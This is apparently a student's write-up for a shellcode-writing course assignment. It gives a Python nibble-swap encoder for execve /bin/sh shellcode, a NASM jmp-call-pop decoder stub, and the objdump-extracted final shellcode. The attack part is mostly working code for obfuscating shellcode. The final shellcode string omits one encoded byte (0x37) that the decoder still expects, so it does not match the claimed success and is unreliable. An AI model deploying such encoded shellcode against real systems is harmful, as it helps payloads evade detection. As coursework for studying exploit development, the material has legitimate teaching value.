SLAEx86 - Assignment 4
The fourth assignment for the SLAEx86 certification includes the following requirements:
- Create a custom encoding scheme like the “Insertion Encoder” we showed you
- POC with using execve-stack as the shellcode to encode with your schema and execute
Seems like a fun exercise with some challenge and creativity. Let’s give it a try …
After going through the course material and reading the requirements of this assignment, it was apparent that I would need to do this in two parts. First, I would create a Python script to do the encoding of the execve-stack /bin/sh shellcode and then write a complimentary decoder in assembly.
Step 1: Python Encoder
For the encoding scheme, I decided to do a ‘swap-byte encoder‘ to encode the execve-stack shellcode. My thought was to take each byte of shellcode and swap it (ex: 0x31 –> 0x13). This was completed by writing the following Python script:
#!/usr/bin/python # Python Swap-Byte Encoder # Example - \x01 --> \x10 # Load shellcode # SLAEx86 execve-stack shellcode used in example ("/bin/sh") shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") src = bytearray(shellcode) # Remove leading \x from shellcode and store in one string sc_string = "" for x in src: sc_string += '%02x' % x # Swap-byte and print encoded shellcode in proper formats encoded1 = "" encoded2 = "" print 'Encoded shellcode ...' + '\n' for x in range(0, len(sc_string)-1, 2): y = sc_string[x+1] + sc_string[x] encoded1 += '\\x' + y encoded2 += '0x' + y + ',' print encoded1 + '\n' print encoded2 + '\n' print 'Len: %d' % len(bytearray(shellcode))
After executing the python script the following result was the output:
[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment4$ ./swapbyte-encoder.py Encoded shellcode ... \x13\x0c\x05\x86\xf2\xf2\x37\x86\x86\xf2\x26\x96\xe6\x98\x3e\x05\x98\x2e\x35\x98\x1e\x0b\xb0\xdc\x08 0x13,0x0c,0x05,0x86,0xf2,0xf2,0x37,0x86,0x86,0xf2,0x26,0x96,0xe6,0x98,0x3e,0x05,0x98,0x2e,0x35,0x98,0x1e,0x0b,0xb0,0xdc,0x08, Len: 25
Step 2: Decode the Shellcode in Assembly
After obtaining the swapbyte encoded shellcode I used the jmp-call-pop technique to write the assembly to do the proper decoding:
global _start section .text _start: jmp short call_decoder decoder: pop esi xor ecx, ecx mov cl, 25 ; Place encoded shellcode length here decode: ror byte [esi], 4 ; rotate the bits to the right by 4 inc esi ; increment the ESI position loop decode jmp short EncodedShellcode call_decoder: call decoder EncodedShellcode: db 0x13,0x0c,0x05,0x86,0xf2,0xf2,0x37,0x86,0x86,0xf2,0x26,0x96,0xe6,0x98,0x3e,0x05,0x98,0x2e,0x35,0x98,0x1e,0x0b,0xb0,0xdc,0x08
After a successful compilation I used the command-linefu objdump command to extract the shellcode:
[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment4$ objdump -d ./swapbyte-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\xeb\x0d\x5e\x31\xc9\xb1\x19\xc0\x0e\x04\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x13\x0c\x05\x86\xf2\xf2\x86\x86\xf2\x26\x96\xe6\x98\x3e\x05\x98\x2e\x35\x98\x1e\x0b\xb0\xdc\x08"
Step 3: Get a /bin/sh Shell
Using the C shell program I placed the extracted shellcode from the swapbyte-decoder.nasm file to compile and execute it to obtain an /bin/sh shell:
Success! There is now a working swap-byte encoder and a swap-byte decoder that is able to execute using the outputted shellcode!